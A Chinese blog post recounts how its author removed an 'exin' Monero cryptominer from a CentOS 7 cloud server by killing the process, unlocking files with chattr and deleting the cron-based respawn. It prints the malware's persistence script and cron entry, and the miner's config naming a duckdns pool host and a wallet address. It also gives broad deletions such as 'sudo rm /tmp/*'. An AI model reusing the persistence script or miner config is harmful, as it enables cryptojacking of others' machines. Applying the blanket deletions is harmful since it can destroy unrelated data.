centos7 清除门罗币挖矿EXIN病毒
由于最近准备面试,所以想要在买的阿里云服务器上部署下自己的项目,发布项目到服务器上之后项目一直崩溃,一看top,有一个exin的进程占了99%
未明确该应用如何被安装到了服务器上,可能是因为docker下载其他镜像文件时,病毒被一并安装。
先杀进程(kill该进程之后i一小时之后进程会重新打开,光杀进程不够)
kill -9 26136找到运行的进程,确定进程位置为
/bin/exin$ ps -a |grep 进程号删除程序,直接删除不成功,必须先执行 chattr -ia exin
$ sudo chattr -ia /bin/exin
$ sudo rm -rf /bin/exin过了一会,又死灰复燃,晕~
排查 定时任务,的确有异常!
$ cat /var/spool/cron/root
MAILTO=''
*/19 * * * * /etc/cron.hourly/agetty >/dev/null 2>&1
1
2
3
$ cat /etc/cron.hourly/agetty
#!/bin/sh
if [ "$(pgrep -f /bin/exin|wc -l)" -eq 0 ]; then
nohup /bin/exin >/dev/null 2>&1 &
fi删除定时任务,也许可以解决了吧?
$ sudo rm /etc/cron.hourly/agetty
$ sudo rm /var/spool/cron/root重启系统后,问题依旧,逛晕~~~~,继续排查 /bin 目录,发现有个config.json
$ sudo vi /bin/config.json
{
"av": 0,
"background": true,
"cpu-affinity": null,
"cpu-priority": 5,
"donate-level": 1,
"log-file": null,
"max-cpu-usage": 100,
"print-time": 30,
"retries": 3,
"retry-pause": 10,
"safe": false,
"threads": null,
"pools": [
{
"url": "epel-mirror.duckdns.org:443",
"user": "4AncaLQuvBThfLuhdhaKh1Pr3ix2547SKYLCQnjJVjNw5mciYYZ7zpeMiD9TS4JYFGBHuyESm9ZEpdpnkK2DMZanJ6rvj2p",
"pass": "z",
"algo": "rx/0",
"coin": "monero",
"rig-id": null,
"nicehash": false,
"keepalive": false,
"variant": -1,
"enabled": true,
"tls": true,
"tls-fingerprint": null
}
],
"api": {
"port": 0,
"access-token": null,
"worker-id": null
}
}删除 config.json,重启后终于解决了。
$ sudo chattr -ia /bin/config.json
$ sudo rm /bin/config.json查看/tmp 目录,如果有相关文件,一并删除。
$ sudo rm /tmp/*汇总:
删除程序,直接删除不成功,必须先执行
chattr -ia exin解决方法,需要删除的文件
$ sudo chattr -ia /bin/config.json
$ sudo rm /bin/config.json
$ sudo chattr -ia /bin/exin
$ sudo rm -rf exin
$ sudo rm /etc/cron.hourly/agetty
$ sudo rm /var/spool/cron/root
$ sudo rm /tmp/*
最后,对一下两篇文章作者深感佩服以及由衷的感谢,文章个别代码引用自以下两篇文章
https://blog.csdn.net/gudufeiyang/article/details/104207860
https://blog.csdn.net/Amy126/article/details/103779198